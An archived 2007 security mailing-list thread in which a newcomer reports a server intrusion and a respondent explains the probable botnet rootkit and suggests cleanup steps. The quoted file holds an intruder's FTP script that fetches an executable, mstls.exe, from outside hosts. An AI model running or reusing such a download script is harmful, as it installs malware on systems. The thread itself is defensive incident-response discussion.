Home page logo

basics logo Security Basics mailing list archives

Re: what next
From: jhori <jhori () ucdavis edu>
Date: Tue, 06 Feb 2007 09:45:02 -0800

nemanja.janic () centroproizvod co yu wrote:
Hello list,
i wasn't sure where to post this, and since i'm just starting out in security, i figured that this is the place.
Here goes:
i've had a fine unknown gentleman enter at his will to my server; among other things he left behind a file named tt (no 
extension) which contained the following lines:

open 14547 user 1 1 get mstls.exe quit open 5191 user 1 1 get mstls.exe quit

I figure this is some script to be used with ftp, or at least i think so. I did tracert to those adresses, but that's where i'm stuck. What can i do next? And any idea what that mstls.exe is? I deleted it, but it was 0 bytes in size. Thanx in advance.

To elaborate a little more on this, it's a rootkit with a ftp built into it. Meaning that it connects to a IRC server somewhere.

Sounds like your machine might still be a bot within a botnet though. I tried connecting to the server mentioned above in mIRC and get a connection refused (meaning that they have some kind of script within the rootkit that will most likely put in a pwd to allow access)

Although you may have already deleted the file, it has most likely installed itself within another folder. I would try and do a search for .mrc files within your PC to try and find that folder. You'll most likely find all the information that you need to get on that server within the folder.

If you don't want to do the research, then I would get some kind of rootkit cleaner...There's a lot to choose from.

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]